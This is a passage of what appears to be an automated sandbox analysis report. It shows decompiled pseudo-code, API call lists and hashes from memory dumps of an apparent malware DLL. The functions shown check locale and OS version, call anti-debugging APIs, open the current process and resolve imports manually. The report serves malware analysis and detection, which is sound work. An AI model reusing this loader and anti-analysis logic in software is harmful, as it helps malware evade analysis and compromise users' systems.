                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                    					goto L18;
                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                    				if(_a4 != 0) {
                                                                                                                                                                                                                                                                    					L11:
                                                                                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                                                                                    					_t56 = E6E1F1CA4(E6E1F16EC,  &_v28);
                                                                                                                                                                                                                                                                    					if(_t56 == 0) {
                                                                                                                                                                                                                                                                    						_v56 = GetLastError();
                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                    						_t31 = WaitForSingleObject(_t56, 0xffffffff);
                                                                                                                                                                                                                                                                    						_v56 = _t31;
                                                                                                                                                                                                                                                                    						if(_t31 == 0) {
                                                                                                                                                                                                                                                                    							GetExitCodeThread(_t56,  &_v56);
                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                    						CloseHandle(_t56);
                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                    					goto L16;
                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                    				if(E6E1F1D7C(_t45,  &_v48) != 0) {
                                                                                                                                                                                                                                                                    					 *0x6e1f41b8 = 0;
                                                                                                                                                                                                                                                                    					goto L11;
                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                    				_t44 = _v48;
                                                                                                                                                                                                                                                                    				_t57 = __imp__GetLongPathNameW;
                                                                                                                                                                                                                                                                    				_t50 =  *_t57(_t44, 0, 0);
                                                                                                                                                                                                                                                                    				if(_t50 == 0) {
                                                                                                                                                                                                                                                                    					L9:
                                                                                                                                                                                                                                                                    					 *0x6e1f41b8 = _t44;
                                                                                                                                                                                                                                                                    					goto L11;
                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                    				_t15 = _t50 + 2; // 0x2
                                                                                                                                                                                                                                                                    				_t39 = E6E1F1C8F(_t50 + _t15);
                                                                                                                                                                                                                                                                    				 *0x6e1f41b8 = _t39;
                                                                                                                                                                                                                                                                    				if(_t39 == 0) {
                                                                                                                                                                                                                                                                    					goto L9;
                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                    					 *_t57(_t44, _t39, _t50);
                                                                                                                                                                                                                                                                    					E6E1F136A(_t44);
                                                                                                                                                                                                                                                                    					goto L11;
                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                    			}




















                                                                                                                                                                                                                                                                    0x6e1f17b3
                                                                                                                                                                                                                                                                    0x6e1f17bc
                                                                                                                                                                                                                                                                    0x6e1f17c0
                                                                                                                                                                                                                                                                    0x6e1f18c8
                                                                                                                                                                                                                                                                    0x6e1f18ce
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x6e1f17c6
                                                                                                                                                                                                                                                                    0x6e1f17c6
                                                                                                                                                                                                                                                                    0x6e1f17cb
                                                                                                                                                                                                                                                                    0x6e1f17d1
                                                                                                                                                                                                                                                                    0x6e1f17e0
                                                                                                                                                                                                                                                                    0x6e1f17e1
                                                                                                                                                                                                                                                                    0x6e1f17e4
                                                                                                                                                                                                                                                                    0x6e1f17f0
                                                                                                                                                                                                                                                                    0x6e1f17f4
                                                                                                                                                                                                                                                                    0x6e1f17fa
                                                                                                                                                                                                                                                                    0x6e1f17fe
                                                                                                                                                                                                                                                                    0x6e1f1805
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x6e1f180b
                                                                                                                                                                                                                                                                    0x6e1f1812
                                                                                                                                                                                                                                                                    0x6e1f1816
                                                                                                                                                                                                                                                                    0x6e1f18b9
                                                                                                                                                                                                                                                                    0x6e1f18b9
                                                                                                                                                                                                                                                                    0x6e1f18c0
                                                                                                                                                                                                                                                                    0x6e1f18c2
                                                                                                                                                                                                                                                                    0x6e1f18c2
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x6e1f18c0
                                                                                                                                                                                                                                                                    0x6e1f181f
                                                                                                                                                                                                                                                                    0x6e1f1872
                                                                                                                                                                                                                                                                    0x6e1f1872
                                                                                                                                                                                                                                                                    0x6e1f1883
                                                                                                                                                                                                                                                                    0x6e1f1887
                                                                                                                                                                                                                                                                    0x6e1f18b5
                                                                                                                                                                                                                                                                    0x6e1f1889
                                                                                                                                                                                                                                                                    0x6e1f188c
                                                                                                                                                                                                                                                                    0x6e1f1894
                                                                                                                                                                                                                                                                    0x6e1f1898
                                                                                                                                                                                                                                                                    0x6e1f18a0
                                                                                                                                                                                                                                                                    0x6e1f18a0
                                                                                                                                                                                                                                                                    0x6e1f18a7
                                                                                                                                                                                                                                                                    0x6e1f18a7
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x6e1f1887
                                                                                                                                                                                                                                                                    0x6e1f182d
                                                                                                                                                                                                                                                                    0x6e1f186c
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x6e1f186c
                                                                                                                                                                                                                                                                    0x6e1f182f
                                                                                                                                                                                                                                                                    0x6e1f1833
                                                                                                                                                                                                                                                                    0x6e1f183e
                                                                                                                                                                                                                                                                    0x6e1f1842
                                                                                                                                                                                                                                                                    0x6e1f1864
                                                                                                                                                                                                                                                                    0x6e1f1864
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x6e1f1864
                                                                                                                                                                                                                                                                    0x6e1f1844
                                                                                                                                                                                                                                                                    0x6e1f1849
                                                                                                                                                                                                                                                                    0x6e1f1850
                                                                                                                                                                                                                                                                    0x6e1f1855
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x6e1f1857
                                                                                                                                                                                                                                                                    0x6e1f185a
                                                                                                                                                                                                                                                                    0x6e1f185d
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x6e1f185d

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                      • Part of subcall function 6E1F146C: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6E1F17B8,747863F0,00000000), ref: 6E1F147B
                                                                                                                                                                                                                                                                      • Part of subcall function 6E1F146C: GetVersion.KERNEL32 ref: 6E1F148A
                                                                                                                                                                                                                                                                      • Part of subcall function 6E1F146C: GetCurrentProcessId.KERNEL32 ref: 6E1F1499
                                                                                                                                                                                                                                                                      • Part of subcall function 6E1F146C: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6E1F14B2
                                                                                                                                                                                                                                                                    • GetSystemTime.KERNEL32(?,747863F0,00000000), ref: 6E1F17CB
                                                                                                                                                                                                                                                                    • SwitchToThread.KERNEL32 ref: 6E1F17D1
                                                                                                                                                                                                                                                                      • Part of subcall function 6E1F15A3: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?,00000000,00000000), ref: 6E1F15F9
                                                                                                                                                                                                                                                                      • Part of subcall function 6E1F15A3: memcpy.NTDLL(?,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?,6E1F17EC), ref: 6E1F168B
                                                                                                                                                                                                                                                                      • Part of subcall function 6E1F15A3: VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,00000000), ref: 6E1F16A6
                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000000,00000000), ref: 6E1F17F4
                                                                                                                                                                                                                                                                    • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 6E1F183C
                                                                                                                                                                                                                                                                    • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 6E1F185A
                                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,6E1F16EC,?,00000000), ref: 6E1F188C
                                                                                                                                                                                                                                                                    • GetExitCodeThread.KERNEL32(00000000,?), ref: 6E1F18A0
                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 6E1F18A7
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(6E1F16EC,?,00000000), ref: 6E1F18AF
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 6E1F18C2
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.605070540.000000006E1F1000.00000020.00020000.sdmp, Offset: 6E1F0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.605056165.000000006E1F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.605084485.000000006E1F3000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.605091636.000000006E1F5000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.605100957.000000006E1F6000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorLastLongNamePathProcessThreadVirtual$AllocCloseCodeCreateCurrentEventExitFreeHandleObjectOpenSingleSleepSwitchSystemTimeVersionWaitmemcpy
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2280543912-0
                                                                                                                                                                                                                                                                    • Opcode ID: edbd9656fe77d4e32fdb2c79b0e4c1a6881dd76873a21643cbdf2522d772e7b8
                                                                                                                                                                                                                                                                    • Instruction ID: 36472a92cdf567d5945f8ba3e4795e00056afb3b84ad318b4fc987d32275ecdb
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: edbd9656fe77d4e32fdb2c79b0e4c1a6881dd76873a21643cbdf2522d772e7b8
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8931C3F1A04B11EBC740DFA5994899F77ECEA96350B204E1AF461C2141E730C9CBA7E2
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                    			E6E1F146C() {
                                                                                                                                                                                                                                                                    				void* _t1;
                                                                                                                                                                                                                                                                    				long _t3;
                                                                                                                                                                                                                                                                    				void* _t4;
                                                                                                                                                                                                                                                                    				long _t5;
                                                                                                                                                                                                                                                                    				void* _t6;
                                                                                                                                                                                                                                                                    				intOrPtr _t8;
                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                    				_t8 =  *0x6e1f41b0;
                                                                                                                                                                                                                                                                    				_t1 = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                                                                    				 *0x6e1f41bc = _t1;
                                                                                                                                                                                                                                                                    				if(_t1 == 0) {
                                                                                                                                                                                                                                                                    					return GetLastError();
                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                    				_t3 = GetVersion();
                                                                                                                                                                                                                                                                    				if(_t3 <= 5) {
                                                                                                                                                                                                                                                                    					_t4 = 0x32;
                                                                                                                                                                                                                                                                    					return _t4;
                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                    					 *0x6e1f41ac = _t3;
                                                                                                                                                                                                                                                                    					_t5 = GetCurrentProcessId();
                                                                                                                                                                                                                                                                    					 *0x6e1f41a8 = _t5;
                                                                                                                                                                                                                                                                    					 *0x6e1f41b0 = _t8;
                                                                                                                                                                                                                                                                    					_t6 = OpenProcess(0x10047a, 0, _t5);
                                                                                                                                                                                                                                                                    					 *0x6e1f41a4 = _t6;
                                                                                                                                                                                                                                                                    					if(_t6 == 0) {
                                                                                                                                                                                                                                                                    						 *0x6e1f41a4 =  *0x6e1f41a4 | 0xffffffff;
                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                    			}









                                                                                                                                                                                                                                                                    0x6e1f146d
                                                                                                                                                                                                                                                                    0x6e1f147b
                                                                                                                                                                                                                                                                    0x6e1f1483
                                                                                                                                                                                                                                                                    0x6e1f1488
                                                                                                                                                                                                                                                                    0x6e1f14d2
                                                                                                                                                                                                                                                                    0x6e1f14d2
                                                                                                                                                                                                                                                                    0x6e1f148a
                                                                                                                                                                                                                                                                    0x6e1f1492
                                                                                                                                                                                                                                                                    0x6e1f14ce
                                                                                                                                                                                                                                                                    0x6e1f14d0
                                                                                                                                                                                                                                                                    0x6e1f1494
                                                                                                                                                                                                                                                                    0x6e1f1494
                                                                                                                                                                                                                                                                    0x6e1f1499
                                                                                                                                                                                                                                                                    0x6e1f14a7
                                                                                                                                                                                                                                                                    0x6e1f14ac
                                                                                                                                                                                                                                                                    0x6e1f14b2
                                                                                                                                                                                                                                                                    0x6e1f14ba
                                                                                                                                                                                                                                                                    0x6e1f14bf
                                                                                                                                                                                                                                                                    0x6e1f14c1
                                                                                                                                                                                                                                                                    0x6e1f14c1
                                                                                                                                                                                                                                                                    0x6e1f14cb
                                                                                                                                                                                                                                                                    0x6e1f14cb

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6E1F17B8,747863F0,00000000), ref: 6E1F147B
                                                                                                                                                                                                                                                                    • GetVersion.KERNEL32 ref: 6E1F148A
                                                                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 6E1F1499
                                                                                                                                                                                                                                                                    • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6E1F14B2
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.605070540.000000006E1F1000.00000020.00020000.sdmp, Offset: 6E1F0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.605056165.000000006E1F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.605084485.000000006E1F3000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.605091636.000000006E1F5000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.605100957.000000006E1F6000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Process$CreateCurrentEventOpenVersion
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 845504543-0
                                                                                                                                                                                                                                                                    • Opcode ID: 6e6229670eb7cf412ae304f6c5a30cbb8bcedad6174fff8349c1a8ce7a571b74
                                                                                                                                                                                                                                                                    • Instruction ID: fa8a1ed508eb33278808408c4792eafa06a49470413e9c8f79c90e3b0c9e5c8c
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6e6229670eb7cf412ae304f6c5a30cbb8bcedad6174fff8349c1a8ce7a571b74
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 53F01771648A11AFEF509FA9B909B493BE4B716B11F14801AF117D91C1D3B06083BBD9
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000001), ref: 6E23A6E6
                                                                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000001), ref: 6E23A6F0
                                                                                                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(6E236BE1,?,?,?,?,?,00000001), ref: 6E23A6FD
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.605127247.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3906539128-0
                                                                                                                                                                                                                                                                    • Opcode ID: de25eedf7e8ff56c69695512c89009e56515807d10e7edcec866287d25d76952
                                                                                                                                                                                                                                                                    • Instruction ID: 30ee73d758a4eff096746bf970583557e9c02759e245245cd69a70790594499a
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: de25eedf7e8ff56c69695512c89009e56515807d10e7edcec866287d25d76952
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1A31D6B491122DDBCF61DF64D9887CDBBB9BF18310F6041EAE41CA6290E7709B858F54
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                                                                                                                                                    			E6E1F1566(void* __ecx) {
                                                                                                                                                                                                                                                                    				char _v8;
                                                                                                                                                                                                                                                                    				signed short _t7;
                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                    				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                                                                                                    				_t7 = GetLocaleInfoA(0x400, 0x5a,  &_v8, 4);
                                                                                                                                                                                                                                                                    				if(_t7 == 0) {
                                                                                                                                                                                                                                                                    					__imp__GetSystemDefaultUILanguage();
                                                                                                                                                                                                                                                                    					VerLanguageNameA(_t7 & 0xffff,  &_v8, 4);
                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                    				return _v8;
                                                                                                                                                                                                                                                                    			}





                                                                                                                                                                                                                                                                    0x6e1f156a
                                                                                                                                                                                                                                                                    0x6e1f157b
                                                                                                                                                                                                                                                                    0x6e1f1583
                                                                                                                                                                                                                                                                    0x6e1f1585
                                                                                                                                                                                                                                                                    0x6e1f1598
                                                                                                                                                                                                                                                                    0x6e1f1598
                                                                                                                                                                                                                                                                    0x6e1f15a2

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetLocaleInfoA.KERNEL32(00000400,0000005A,00000000,00000004,?,?,6E1F1C5E,?,6E1F1810,?,00000000,00000000,?,?,?,6E1F1810), ref: 6E1F157B
                                                                                                                                                                                                                                                                    • GetSystemDefaultUILanguage.KERNEL32(?,?,6E1F1C5E,?,6E1F1810,?,00000000,00000000,?,?,?,6E1F1810), ref: 6E1F1585
                                                                                                                                                                                                                                                                    • VerLanguageNameA.KERNEL32(?,00000000,00000004,?,?,6E1F1C5E,?,6E1F1810,?,00000000,00000000,?,?,?,6E1F1810), ref: 6E1F1598
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.605070540.000000006E1F1000.00000020.00020000.sdmp, Offset: 6E1F0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.605056165.000000006E1F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.605084485.000000006E1F3000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.605091636.000000006E1F5000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.605100957.000000006E1F6000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Language$DefaultInfoLocaleNameSystem
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3724080410-0
                                                                                                                                                                                                                                                                    • Opcode ID: 5fa39af46f5ef7cfe40a1aa353f8680ce32723489b71c0b2e209fb0c23e2b942
                                                                                                                                                                                                                                                                    • Instruction ID: 2d1935270d03fab38e2d727a1975070e3d2374790d4dd5e85ad56ed523c72610
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5fa39af46f5ef7cfe40a1aa353f8680ce32723489b71c0b2e209fb0c23e2b942
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F2E048A4740244F6E700D7919C0AFBD72FC970170AF500045F702D60C0D6749A09F766
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,?,6E23C28A,?,?,?,?,?,6E243E50), ref: 6E23C2AD
                                                                                                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000,?,6E23C28A,?,?,?,?,?,6E243E50), ref: 6E23C2B4
                                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 6E23C2C6
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.605127247.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1703294689-0
                                                                                                                                                                                                                                                                    • Opcode ID: a11adbbf47f32df02f4b8bc3941fd879a2df3bdc84291a0492161201ca5f837f
                                                                                                                                                                                                                                                                    • Instruction ID: 00cbdae6bf967362a46e26f2fb61caa15db8d5541a56d3846922b9f9b7dfefc7
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a11adbbf47f32df02f4b8bc3941fd879a2df3bdc84291a0492161201ca5f837f
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 10E04F7100051DEFCF126BA0CA0DA883F2BFB55742B100410F8098A120CB36D892CEA0
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.605127247.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: d8c182849ccbed50c139c48f842e02fa15e35fca7807212bb1b4b6bfddac4a1b
                                                                                                                                                                                                                                                                    • Instruction ID: ea9ce7fa25cb7415b27595a73e6046da6669f9351f7f35c5b74006c632ec9e17
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d8c182849ccbed50c139c48f842e02fa15e35fca7807212bb1b4b6bfddac4a1b
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 46F141B1E1022E9FDF14CFA9C99069EB7B6FF88314F258669D915A7344D730AA01CF90
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                    			E6E1F1F31(void* __edi, intOrPtr _a4) {
                                                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                                                    				intOrPtr* _v12;
                                                                                                                                                                                                                                                                    				_Unknown_base(*)()** _v16;
                                                                                                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                                                                                                    				signed short _v24;
                                                                                                                                                                                                                                                                    				struct HINSTANCE__* _v28;
                                                                                                                                                                                                                                                                    				intOrPtr _t43;
                                                                                                                                                                                                                                                                    				intOrPtr* _t45;
                                                                                                                                                                                                                                                                    				intOrPtr _t46;
                                                                                                                                                                                                                                                                    				struct HINSTANCE__* _t47;
                                                                                                                                                                                                                                                                    				intOrPtr* _t49;
                                                                                                                                                                                                                                                                    				intOrPtr _t50;
                                                                                                                                                                                                                                                                    				signed short _t51;
                                                                                                                                                                                                                                                                    				_Unknown_base(*)()* _t53;
                                                                                                                                                                                                                                                                    				CHAR* _t54;
                                                                                                                                                                                                                                                                    				_Unknown_base(*)()* _t55;
                                                                                                                                                                                                                                                                    				void* _t58;
                                                                                                                                                                                                                                                                    				signed int _t59;
                                                                                                                                                                                                                                                                    				_Unknown_base(*)()* _t60;
                                                                                                                                                                                                                                                                    				intOrPtr _t61;
                                                                                                                                                                                                                                                                    				intOrPtr _t65;
                                                                                                                                                                                                                                                                    				signed int _t68;
                                                                                                                                                                                                                                                                    				void* _t69;
                                                                                                                                                                                                                                                                    				CHAR* _t71;
                                                                                                                                                                                                                                                                    				signed short* _t73;
                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                    				_t69 = __edi;
                                                                                                                                                                                                                                                                    				_v20 = _v20 & 0x00000000;
                                                                                                                                                                                                                                                                    				_t59 =  *0x6e1f41cc;
                                                                                                                                                                                                                                                                    				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x1b4cdd98));
                                                                                                                                                                                                                                                                    				if(_t43 != 0) {
                                                                                                                                                                                                                                                                    					_t45 = _t43 + __edi;
                                                                                                                                                                                                                                                                    					_v12 = _t45;
                                                                                                                                                                                                                                                                    					_t46 =  *((intOrPtr*)(_t45 + 0xc));
                                                                                                                                                                                                                                                                    					if(_t46 != 0) {
                                                                                                                                                                                                                                                                    						while(1) {
                                                                                                                                                                                                                                                                    							_t71 = _t46 + _t69;
                                                                                                                                                                                                                                                                    							_t47 = LoadLibraryA(_t71);
                                                                                                                                                                                                                                                                    							_v28 = _t47;
                                                                                                                                                                                                                                                                    							if(_t47 == 0) {
                                                                                                                                                                                                                                                                    								break;
                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                    							_v24 = _v24 & 0x00000000;
                                                                                                                                                                                                                                                                    							 *_t71 = _t59 - 0x63699bc3;
                                                                                                                                                                                                                                                                    							_t49 = _v12;
                                                                                                                                                                                                                                                                    							_t61 =  *((intOrPtr*)(_t49 + 0x10));
                                                                                                                                                                                                                                                                    							_t50 =  *_t49;
                                                                                                                                                                                                                                                                    							if(_t50 != 0) {
                                                                                                                                                                                                                                                                    								L6:
                                                                                                                                                                                                                                                                    								_t73 = _t50 + _t69;
                                                                                                                                                                                                                                                                    								_v16 = _t61 + _t69;
                                                                                                                                                                                                                                                                    								while(1) {
                                                                                                                                                                                                                                                                    									_t51 =  *_t73;
                                                                                                                                                                                                                                                                    									if(_t51 == 0) {
                                                                                                                                                                                                                                                                    										break;
                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                    									if(__eflags < 0) {
                                                                                                                                                                                                                                                                    										__eflags = _t51 - _t69;
                                                                                                                                                                                                                                                                    										if(_t51 < _t69) {
                                                                                                                                                                                                                                                                    											L12:
                                                                                                                                                                                                                                                                    											_t21 =  &_v8;
                                                                                                                                                                                                                                                                    											 *_t21 = _v8 & 0x00000000;
                                                                                                                                                                                                                                                                    											__eflags =  *_t21;
                                                                                                                                                                                                                                                                    											_v24 =  *_t73 & 0x0000ffff;
                                                                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                                                                    											_t65 = _a4;
                                                                                                                                                                                                                                                                    											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
                                                                                                                                                                                                                                                                    											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
                                                                                                                                                                                                                                                                    												goto L12;
                                                                                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                                                                                    												goto L11;
                                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                                                    										_t51 = _t51 + _t69;
                                                                                                                                                                                                                                                                    										L11:
                                                                                                                                                                                                                                                                    										_v8 = _t51;
                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                    									_t53 = _v8;
                                                                                                                                                                                                                                                                    									__eflags = _t53;
                                                                                                                                                                                                                                                                    									if(_t53 == 0) {
                                                                                                                                                                                                                                                                    										_t54 = _v24 & 0x0000ffff;
                                                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                                                    										_t54 = _t53 + 2;
                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                    									_t55 = GetProcAddress(_v28, _t54);
                                                                                                                                                                                                                                                                    									__eflags = _t55;
                                                                                                                                                                                                                                                                    									if(__eflags == 0) {
                                                                                                                                                                                                                                                                    										_v20 = _t59 - 0x63699b44;
                                                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                                                    										_t68 = _v8;
                                                                                                                                                                                                                                                                    										__eflags = _t68;
                                                                                                                                                                                                                                                                    										if(_t68 != 0) {
                                                                                                                                                                                                                                                                    											 *_t68 = _t59 - 0x63699bc3;
                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                    										 *_v16 = _t55;
                                                                                                                                                                                                                                                                    										_t58 = 0x725990f8 + _t59 * 4;
                                                                                                                                                                                                                                                                    										_t73 = _t73 + _t58;
                                                                                                                                                                                                                                                                    										_t32 =  &_v16;
                                                                                                                                                                                                                                                                    										 *_t32 = _v16 + _t58;
                                                                                                                                                                                                                                                                    										__eflags =  *_t32;
                                                                                                                                                                                                                                                                    										continue;
                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                    									goto L23;
                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                                    								_t50 = _t61;
                                                                                                                                                                                                                                                                    								if(_t61 != 0) {
                                                                                                                                                                                                                                                                    									goto L6;
                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                    							L23:
                                                                                                                                                                                                                                                                    							_v12 = _v12 + 0x14;
                                                                                                                                                                                                                                                                    							_t46 =  *((intOrPtr*)(_v12 + 0xc));
                                                                                                                                                                                                                                                                    							if(_t46 != 0) {
                                                                                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                                    							}
